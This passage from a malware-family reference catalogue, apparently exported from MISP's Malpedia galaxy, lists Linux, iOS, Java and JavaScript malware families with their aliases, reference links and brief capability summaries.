https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

Wirenet (ELF)

The tag is: misp-galaxy:malpedia="Wirenet (ELF)"

Wirenet (ELF) is also known as:

Table 1113. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet
http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html
https://news.drweb.com/show/?i=2679&lng=en&c=14

X-Agent (ELF)

The tag is: misp-galaxy:malpedia="X-Agent (ELF)"

X-Agent (ELF) is also known as:

chopstick
fysbis
splm

Table 1114. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent
https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf

Xanthe

The tag is: misp-galaxy:malpedia="Xanthe"

Xanthe is also known as:

Table 1115. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe
https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html
https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

Xaynnalc

The tag is: misp-galaxy:malpedia="Xaynnalc"

Xaynnalc is also known as:

Table 1116. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc
https://twitter.com/michalmalik/status/846368624147353601

Xbash

The tag is: misp-galaxy:malpedia="Xbash"

Xbash is also known as:

Table 1117. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash
https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

XOR DDoS

Linux DDoS C&C Malware

The tag is: misp-galaxy:malpedia="XOR DDoS"

XOR DDoS is also known as:

XORDDOS

Table 1118. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos
https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/
https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf
https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/
https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf
https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html
https://en.wikipedia.org/wiki/Xor_DDoS
https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/
https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775
https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html
https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/
https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

ZHtrap

The tag is: misp-galaxy:malpedia="ZHtrap"

ZHtrap is also known as:

Table 1119. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.zhtrap
https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/

Zollard

The tag is: misp-galaxy:malpedia="Zollard"

Zollard is also known as:

darlloz

Table 1120. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard
https://blogs.cisco.com/security/the-internet-of-everything-including-malware

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

The tag is: misp-galaxy:malpedia="AutoCAD Downloader"

AutoCAD Downloader is also known as:

Acad.Bursted
Duxfas

Table 1121. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad
https://github.com/Hopfengetraenk/Fas-Disasm
https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft

DualToy (iOS)

The tag is: misp-galaxy:malpedia="DualToy (iOS)"

DualToy (iOS) is also known as:

Table 1122. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy
http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

GuiInject

The tag is: misp-galaxy:malpedia="GuiInject"

GuiInject is also known as:

Table 1123. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject
https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/

lightSpy

The tag is: misp-galaxy:malpedia="lightSpy"

lightSpy is also known as:

Table 1124. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy
https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/
https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf

Phenakite

The tag is: misp-galaxy:malpedia="Phenakite"

Phenakite is also known as:

Dakkatoni

Table 1125. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.phenakite
https://malware4all.blogspot.com/2021/05/grab-your-own-copy-phenakite-ios.html

PoisonCarp

The tag is: misp-galaxy:malpedia="PoisonCarp"

PoisonCarp is also known as:

INSOMNIA

Table 1126. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp
https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/
https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/
https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html

Postlo

The tag is: misp-galaxy:malpedia="Postlo"

Postlo is also known as:

Table 1127. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.postlo
https://twitter.com/opa334dev/status/1374754519268098051

WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker

The tag is: misp-galaxy:malpedia="WireLurker (iOS)"

WireLurker (iOS) is also known as:

Table 1128. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

X-Agent (iOS)

The tag is: misp-galaxy:malpedia="X-Agent (iOS)"

X-Agent (iOS) is also known as:

Table 1129. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/

AdWind

Part of Malware-as-service platform Used as a generic name for Java-based RAT Functionality - collect general system and user information - terminate process -log keystroke -take screenshot and access webcam - steal cache password from local or web forms - download and execute Malware - modify registry - download components - Denial of Service attacks - Acquire VPN certificates

Initial infection vector 1. Email to JAR files attached 2. Malspam URL to downlaod the malware

Persistence - Runkey - HKCU\Software\Microsoft\Windows\current version\run

Hiding Uses attrib.exe

Notes on Adwind The malware is not known to be proxy aware

The tag is: misp-galaxy:malpedia="AdWind"

AdWind is also known as:

AlienSpy
Frutas
JBifrost
JSocket
Sockrat
UNRECOM

Table 1130. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind
https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html
https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blogs.seqrite.com/evolution-of-jrat-java-malware/
https://research.checkpoint.com/malware-against-the-c-monoculture/
http://malware-traffic-analysis.net/2017/07/04/index.html
http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat
https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885
https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat
https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/
https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/
https://citizenlab.ca/2015/12/packrat-report/

Adzok

The tag is: misp-galaxy:malpedia="Adzok"

Adzok is also known as:

Table 1131. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok
https://citizenlab.ca/2015/12/packrat-report/

Banload

The tag is: misp-galaxy:malpedia="Banload"

Banload is also known as:

Table 1132. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload
https://colin.guru/index.php?title=Advanced_Banload_Analysis
https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload

Blue Banana RAT

The tag is: misp-galaxy:malpedia="Blue Banana RAT"

Blue Banana RAT is also known as:

Table 1133. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana
https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community

CrossRAT

The tag is: misp-galaxy:malpedia="CrossRAT"

CrossRAT is also known as:

Trupto

Table 1134. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat
https://objective-see.com/blog/blog_0x28.html
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

EpicSplit RAT

EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.

The tag is: misp-galaxy:malpedia="EpicSplit RAT"

EpicSplit RAT is also known as:

Table 1135. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.epicsplit
https://www.zscaler.com/blogs/security-research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat

FEimea RAT

The tag is: misp-galaxy:malpedia="FEimea RAT"

FEimea RAT is also known as:

Table 1136. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat
https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

The tag is: misp-galaxy:malpedia="IceRat"

IceRat is also known as:

Table 1137. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat
https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM’s local application and the goal is to remotely control its operation. The malware’s primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

The tag is: misp-galaxy:malpedia="JavaDispCash"

JavaDispCash is also known as:

Table 1138. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash
https://twitter.com/r3c0nst/status/1111254169623674882
https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore

JavaLocker

The tag is: misp-galaxy:malpedia="JavaLocker"

JavaLocker is also known as:

JavaEncrypt Ransomware

Table 1139. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker
https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html
https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.

The tag is: misp-galaxy:malpedia="jRAT"

jRAT is also known as:

Jacksbot

Table 1140. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat
https://www.eff.org/files/2018/01/29/operation-manul.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/
https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/
https://research.checkpoint.com/malware-against-the-c-monoculture/
https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered

jSpy

The tag is: misp-galaxy:malpedia="jSpy"

jSpy is also known as:

Table 1141. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy
https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/

Octopus Scanner

The tag is: misp-galaxy:malpedia="Octopus Scanner"

Octopus Scanner is also known as:

Table 1142. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner
http://blog.nsfocus.net/github-ocs-0605/
https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain

Qarallax RAT

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

The tag is: misp-galaxy:malpedia="Qarallax RAT"

Qarallax RAT is also known as:

Table 1143. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat
http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/

Qealler

The tag is: misp-galaxy:malpedia="Qealler"

Qealler is also known as:

Pyrogenic Infostealer

Table 1144. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler
https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/
https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/
https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/
https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer
https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/
https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf
https://www.herbiez.com/?p=1352

QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, …), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

The tag is: misp-galaxy:malpedia="QRat"

QRat is also known as:

Quaverse RAT

Table 1145. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat
https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT—Remote-Access-as-a-Service/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/
https://www.digitrustgroup.com/java-rat-qrat/

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

The tag is: misp-galaxy:malpedia="Ratty"

Ratty is also known as:

Table 1146. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty
https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/

STRRAT

According to G DATA, STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.

Older version of the malware came with a rudimentary ransomware module that appends ".crimson" to affected files. The affected files are not encrypted, but simply reamed. If the extension is removed, the files can be opened as usual.

As of at least version 1.5, STRRAT has an implemented encryption routine.

The tag is: misp-galaxy:malpedia="STRRAT"

STRRAT is also known as:

Table 1147. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://www.jaiminton.com/reverse-engineering/strrat
https://twitter.com/MsftSecIntel/status/1395138347601854465
https://www.gdatasoftware.com/blog/strrat-crimson
https://isc.sans.edu/diary/rss/27798

SupremeBot

The tag is: misp-galaxy:malpedia="SupremeBot"

SupremeBot is also known as:

BlazeBot

Table 1148. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot
https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

AIRBREAK

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

The tag is: misp-galaxy:malpedia="AIRBREAK"

AIRBREAK is also known as:

Table 1149. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak
https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html
http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html
https://www.secureworks.com/research/threat-profiles/bronze-mohawk

Bateleur

The tag is: misp-galaxy:malpedia="Bateleur"

Bateleur is also known as:

Table 1150. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor

BELLHOP

BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host(WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:
Creating a Run key in the Registry
Creating a RunOnce key in the Registry
Creating a persistent named scheduled task
BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

The tag is: misp-galaxy:malpedia="BELLHOP"

BELLHOP is also known as:

Table 1151. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

CACTUSTORCH

According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.

The tag is: misp-galaxy:malpedia="CACTUSTORCH"

CACTUSTORCH is also known as:

Table 1152. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch
https://www.macnica.net/file/mpression_automobile.pdf
https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf
https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/
https://www.codercto.com/a/46729.html
https://github.com/mdsecactivebreach/CACTUSTORCH

CryptoNight

WebAssembly-based crpyto miner.

The tag is: misp-galaxy:malpedia="CryptoNight"

CryptoNight is also known as:

Table 1153. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight
https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec
https://twitter.com/JohnLaTwC/status/983011262731714565

CukieGrab

The tag is: misp-galaxy:malpedia="CukieGrab"

CukieGrab is also known as:

Roblox Trade Assist

Table 1154. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx
http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/

DNSRat

The tag is: misp-galaxy:malpedia="DNSRat"

DNSRat is also known as:

DNSbot

Table 1155. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat
https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

Enrume

The tag is: misp-galaxy:malpedia="Enrume"

Enrume is also known as:

Ransom32

Table 1156. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume
https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/

EVILNUM (Javascript)

The tag is: misp-galaxy:malpedia="EVILNUM (Javascript)"

EVILNUM (Javascript) is also known as:

Table 1157. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum
https://github.com/eset/malware-ioc/tree/master/evilnum
https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw
https://securelist.com/deathstalker-mercenary-triumvirate/98177/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html
https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf
http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html
https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

GootLoader

The tag is: misp-galaxy:malpedia="GootLoader"

GootLoader is also known as:

Table 1158. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader
https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/
https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/
https://community.riskiq.com/article/f5d5ed38

grelos

grelos is a skimmer used for magecart-style attacks.

The tag is: misp-galaxy:malpedia="grelos"

grelos is also known as:

Table 1159. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos
https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745
https://www.riskiq.com/blog/labs/magecart-medialand/
https://community.riskiq.com/article/8c4b4a7a

Griffon

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

The tag is: misp-galaxy:malpedia="Griffon"

Griffon is also known as:

Harpy

Table 1160. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon
https://twitter.com/ItsReallyNick/status/1059898708286939136
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

inter

The tag is: misp-galaxy:malpedia="inter"

inter is also known as:

Table 1161. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.inter
https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html

Jeniva

The tag is: misp-galaxy:malpedia="Jeniva"

Jeniva is also known as:

Table 1162. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.jeniva
https://imp0rtp3.wordpress.com/2021/08/12/tetris/

Jetriz

The tag is: misp-galaxy:malpedia="Jetriz"

Jetriz is also known as:

Table 1163. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.jetriz
https://imp0rtp3.wordpress.com/2021/08/12/tetris/

jspRAT

The tag is: misp-galaxy:malpedia="jspRAT"

jspRAT is also known as:

Table 1164. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

KopiLuwak

The tag is: misp-galaxy:malpedia="KopiLuwak"

KopiLuwak is also known as:

Table 1165. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/
https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/

LNKR

The tag is: misp-galaxy:malpedia="LNKR"

LNKR is also known as:

Table 1166. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr
https://github.com/Zenexer/lnkr
https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md
https://www.riskiq.com/blog/labs/lnkr-browser-extension/
https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/

magecart

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it’s a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from "input fields" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.

The tag is: misp-galaxy:malpedia="magecart"

magecart is also known as:

Table 1167. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart
https://community.riskiq.com/article/743ea75b/description
https://sansec.io/research/magento-2-persistent-parasite
https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf
https://sansec.io/research/north-korea-magecart
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.riskiq.com/blog/labs/magecart-nutribullet/
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://www.riskiq.com/blog/labs/magecart-medialand/
https://twitter.com/AffableKraut/status/1385030485676544001
https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/
https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/
https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter
https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html
https://community.riskiq.com/article/fda1f967
https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/
https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/
https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/
https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/
https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/
https://twitter.com/AffableKraut/status/1415425132080816133?s=20
https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/
https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/
https://www.goggleheadedhacker.com/blog/post/14
https://www.riskiq.com/blog/labs/magecart-group-12-olympics/
https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/
https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/
https://community.riskiq.com/article/5bea32aa
https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/
https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/
https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/
https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/
https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/
https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/
https://community.riskiq.com/article/30f22a00
https://securelist.com/apt-trends-report-q2-2019/91897/
https://community.riskiq.com/article/14924d61
